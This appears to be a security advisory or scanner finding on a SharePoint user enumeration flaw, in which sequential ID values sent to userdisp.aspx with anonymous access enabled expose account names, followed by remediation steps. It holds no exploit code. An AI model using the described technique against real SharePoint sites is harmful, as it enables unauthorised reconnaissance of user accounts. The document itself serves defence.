SharePoint user enumeration
Description
Microsoft SharePoint contains a user enumeration vulnerability in the userdisp.aspx page when anonymous access is improperly configured. Unauthenticated attackers can systematically discover valid SharePoint user accounts by manipulating the ID parameter in sequential requests. This misconfiguration allows unauthorized parties to harvest a complete list of user accounts without requiring authentication.
Remediation
Disable anonymous access to the userdisp.aspx page and related user profile pages. Navigate to SharePoint Central Administration, select the web application, and configure the following:
1. Go to Central Administration > Application Management > Manage web applications
2. Select the affected web application and click Authentication Providers
3. Ensure Anonymous Access is disabled for the zone
4. For the User Profile Service Application, verify that 'Everyone' permissions are removed from user profile viewing
5. Set appropriate permissions so only authenticated users can access user profile pages
6. Implement network-level access controls to restrict access to administrative and user enumeration endpoints
After making changes, verify that unauthenticated requests to userdisp.aspx return an access denied error rather than user information.